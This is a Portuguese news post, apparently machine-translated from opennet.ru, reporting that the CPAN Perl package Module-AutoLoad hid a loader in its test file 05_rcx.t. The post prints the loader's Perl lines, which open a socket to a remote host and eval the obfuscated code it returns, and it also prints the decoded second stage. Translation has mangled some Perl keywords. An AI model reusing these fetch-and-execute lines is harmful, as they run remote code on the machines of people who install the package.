ProHoster > Blog > notícias da internet > Código malicioso detectado no pacote Module-AutoLoad Perl

Código malicioso detectado no pacote Module-AutoLoad Perl

Em um pacote Perl distribuído através do diretório CPAN Módulo-AutoLoad, projetado para carregar módulos CPAN automaticamente em tempo real, identificado Código malicioso. A inserção maliciosa foi encontrado no código de teste 05_rcx.t, que está sendo enviado desde 2011.
Vale ressaltar que surgiram dúvidas sobre o carregamento de código questionável em stackoverflow em 2016.

A atividade maliciosa se resume a uma tentativa de baixar e executar código de um servidor de terceiros (http://r.cx:1/) durante a execução de um conjunto de testes iniciado durante a instalação do módulo. Supõe-se que o código inicialmente baixado do servidor externo não era malicioso, mas agora a solicitação é redirecionada para o domínio ww.limera1n.com, que fornece sua parte do código para execução.

Para organizar o download em um arquivo 05_rcx.t O seguinte código é usado:

meu $prog = __FILE__;
$prog =~s{[^/]+\.t}{../contrib/RCX.pl}x;
meu $try = `$^X $prog`;

O código especificado faz com que o script seja executado ../contrib/RCX.pl, cujo conteúdo é reduzido à linha:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Este script carrega confuso usando o serviço perlobfuscator.com código do host externo r.cx (códigos de caracteres 82.46.99.88 correspondem ao texto "R.cX") e o executa no bloco eval.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; imprimir<$b>;'
eval descompactar u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Depois de descompactar, o seguinte é finalmente executado: código:

imprimir{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warning$@while$b;1

O pacote problemático foi removido do repositório. PAUSE (Perl Authors Upload Server) e a conta do autor do módulo é bloqueada. Neste caso, o módulo ainda permanece está disponível no arquivo MetaCPAN e pode ser instalado diretamente do MetaCPAN usando alguns utilitários como cpanminus. É notadoque o pacote não foi amplamente distribuído.

Interessante discutir conectado e o autor do módulo, que negou a informação de que código malicioso foi inserido após seu site “r.cx” ter sido hackeado e explicou que estava apenas se divertindo, e usou o perlobfuscator.com não para esconder algo, mas para reduzir o tamanho do código e simplificando sua cópia através da área de transferência. A escolha do nome da função “botstrap” é explicada pelo fato de que esta palavra “soa como bot e é mais curta que bootstrap”. O autor do módulo garantiu ainda que as manipulações identificadas não realizam ações maliciosas, mas apenas demonstram o carregamento e execução de código via TCP.

Fonte: opennet.ru

Adicionar um comentário